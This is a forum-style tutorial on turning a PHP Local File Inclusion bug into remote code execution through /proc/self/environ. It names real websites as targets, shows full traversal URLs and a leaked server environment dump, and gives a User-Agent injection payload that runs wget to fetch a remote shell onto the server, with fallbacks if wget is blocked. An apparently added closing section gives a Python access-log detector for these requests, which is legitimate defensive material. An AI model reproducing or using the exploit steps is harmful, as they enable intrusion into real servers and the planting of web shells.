OK, I'll try to explain this method. If I get something wrong, please correct me.
:D
LFI: LOCAL FILE INCLUDE
A bug where a user can include an arbitrary file into a PHP file.
Here is a simple example.
The file xxx.php contains the following code:
<?php include($_GET['i']); ?>
We can exploit it like this:
http://site.com/xxx.php?i=[File To Include]
Once this bug is found, there are 2 ways to place a shell on the server,
namely:
LFI to RCE (REMOTE COMMAND EXECUTION), or via PROC/SELF/ENVIRON
Actually, the proc/self/environ file has an RCE bug in it :D
But for LFI to RCE we have to find the access log on the server.
After that we poison the log so that the log contains an RCE bug.
For the details, just Google LFI to RCE :D
Back to the topic: uploading a shell through the proc/self/environ file.
Say we have found an LFI bug:
http://www.wofchurchke.org/index.php?option=com_gcalendar&controller=[LFI]
From here we test whether the proc/self/environ file is there.
http://www.wofchurchke.org/index.php?option=com_gcalendar&controller=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00
%00 --> this is the NULL character, so any characters that come after this NULL char get dropped. :D
From the target above we got the proc/self/environ file :D
DOCUMENT_ROOT=/home/content/l/e/c/leconnections/html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP_ACCEPT_ENCODING=gzip,deflate
HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
HTTP_CONNECTION=keep-alive
HTTP_HOST=www.wofchurchke.org
HTTP_KEEP_ALIVE=300
HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
PATH=/bin:/usr/bin:/usr/local/bin
PATH_INFO=//index.php
PHPRC=/home/content/l/e/c/leconnections/html
QUERY_STRING=option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00
RAILS_ENV=production
REDIRECT_STATUS=200
REMOTE_ADDR=206.123.88.83
REMOTE_PORT=1560
REQUEST_METHOD=GET
REQUEST_URI=//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00
SCRIPT_FILENAME=/home/content/l/e/c/leconnections/html/wof//index.php
SCRIPT_NAME=//index.php
SERVER_ADDR=208.109.181.58
SERVER_ADMIN=support@supportwebsite.com
SERVER_NAME=www.wofchurchke.org
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.1
SERVER_SIGNATURE=
Apache/1.3.33 Server at
www.wofchurchke.org Port 80
SERVER_SOFTWARE=Apache
SPI=TRUE
SUBDOMAIN_DOCUMENT_ROOT=/home/content/l/e/c/leconnections/html/wof
Fatal error: Class 'GCalendarController../../../../../../../../../../../../../../../proc/self/environ' not found in /home/content/l/e/c/leconnections/html/wof/components/com_gcalendar/gcalendar.php on line 21
From there we inject using the Tamper Data add-on < MOZILLA >
Search Google for "TAMPER DATA ADDON MOZILLA"
http://www.equip2conceal.com//index.php?option=com_gcalendar&controller=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00
After that, make sure the target still ends in %00 in the Mozilla address bar.
Don't press Enter yet.
Turn on Tamper Data:
Tools - Tamper Data - Start Tamper
Then click the address bar and press ENTER.
A new window will appear ( TAMPER WITH REQUEST ).
Untick the "continue tampering" checkbox.
Make sure the request shown in Tamper With Request is our target.
If it isn't, just click Submit.
Once it is the right target, click Tamper.
A new window will appear: TAMPER POPUP.
The User-Agent field contains:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
Delete that and replace it with:
<?system('wget http://<SHELL IN TXT FORM> -O OUTPUT.php');?>
What it does is execute the WGET command, that is,
the server downloads
http://<SHELL TXT> and writes the output to OUTPUT.php.
When that's done, check it.
Say our target is
http://www.xxx.com/xxx/xxx/?p=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00
Then our shell is here:
http://www.xxx.com/xxx/xxx/OUTPUT.php
Basically, it ends up in the path of the file that has the LFI bug :D
But if after tampering our shell isn't there, it means the target has already been patched,
or the WGET command is disabled / SAFE MODE is ON on the server.
If wget is disabled, try ( LWP-DOWNLOAD / FETCH ).
THAT'S ALL, GOOD LUCK...
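
From the defender's side, the requests described in this post leave recognisable traces in the web server's access log. The following is an added example, not part of the original post: a Python check over Combined Log Format lines that flags directory traversal, a /proc/self/environ target, a NUL byte, and a PHP open tag in the User-Agent or Referer. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

SAMPLE_LOG = [  # constructed lines; the IPs are from documentation ranges
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_gcalendar&controller=gcalendar HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_gcalendar&controller=..%2F..%2F..%2Fproc%2Fself%2Fenviron%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_gcalendar&controller=..%252F..%252Fproc%252Fself%252Fenviron%2500 HTTP/1.1" 200 2048 "-" "<?php /* constructed marker */ ?>"',
]

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252F) is also caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def findings(line):
    """Return the set of LFI-to-RCE indicators present in one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return {"unparsed"}
    uri = decode(m.group("uri")).replace("\\", "/")
    hits = set()
    if re.search(r"(^|[=/])\.\./", uri):
        hits.add("traversal")
    if re.search(r"proc/(self|\d+)/environ", uri):
        hits.add("proc_environ")
    if "\x00" in uri:
        hits.add("null_byte")
    # Header values are copied into the process environment; a PHP tag there is never legitimate.
    if any("<?" in m.group(h) for h in ("ua", "referer")):
        hits.add("php_tag_in_header")
    return hits

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(sorted(findings(line)), line[:60])
```

A request that combines proc_environ with php_tag_in_header from the same client is the pattern worth alerting on; traversal alone is common scanner noise.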